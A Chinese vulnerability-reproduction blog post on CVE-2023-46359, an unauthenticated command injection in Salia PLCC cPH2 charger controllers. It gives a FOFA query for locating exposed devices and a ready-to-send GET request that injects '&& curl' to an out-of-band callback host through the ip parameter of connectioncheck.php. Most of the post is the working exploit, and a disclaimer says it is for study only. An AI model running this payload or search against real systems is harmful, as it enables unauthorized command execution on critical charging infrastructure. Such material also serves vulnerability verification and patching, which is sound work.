【漏洞复现】Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)

0x01 漏洞概述

Salia PLCC cPH2 v1.87.0 及更早版本中存在一个操作系统命令注入漏洞,该漏洞可能允许未经身份验证的远程攻击者通过传递给连接检查功能的特制参数在系统上执行任意命令。

0x02 测绘语句

复制代码
fofa:"Salia PLCC"

0x03 漏洞复现

复制代码
​
payload:GET /connectioncheck.php?
ip=url_encode(127.0.0.1 && curl http://dnslog) HTTP/1.1

漏洞复现:GET /connectioncheck.php?ip=127.0.0.1+%26%26+curl+http%3A%2F%2F4kpxqqvqog8u6p2ew6xzh3c7jypvdr1g.oastify.com HTTP/1.1

​

0x04 影响范围

复制代码
cPH2 v<= 1.87.0

0x05 参考链接

https://github.com/projectdiscovery/nuclei-templates/blob/7f071a1f5a59a3a9812a58e990f266883607b30c/http/cves/2023/CVE-2023-46359.yaml#L12

0x06 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

相关推荐
Bruce_Liuxiaowei几秒前
[特殊字符] 排查VMnet1无IP的步骤
网络·网络协议·1024程序员节
星哥说事17 分钟前
网络自动化:Ansible/Netmiko 网络设备批量配置与管理
网络·自动化·ansible
qq_4798754342 分钟前
Five RFCs
网络
Ronin3051 小时前
【Linux网络】定制协议
linux·网络·协议·序列化和反序列化·定制协议·tcp网络通信
腾视科技1 小时前
安全驾驶 智在掌控|腾视科技ES06终端,为车辆运营赋能
大数据·人工智能·科技·安全·大模型
cliproxydaili1 小时前
Cliproxy与Adspower指纹浏览器:跨境业务安全与效率的双重引擎
运维·服务器·安全
byte轻骑兵2 小时前
医疗信创标杆实践:浙人医 LIS 系统异构多活容灾架构深度解析(附 KingbaseES 实战)
网络·架构·1024程序员节
zandy10112 小时前
2025企业级智能体平台架构拆解: 如何安全合规下构筑强大的护城河
大数据·安全·架构·智能体
西门吹雪@1322 小时前
局域网手机/平板无数据线传输文件-通过网络传输LocalSend
网络·智能手机·电脑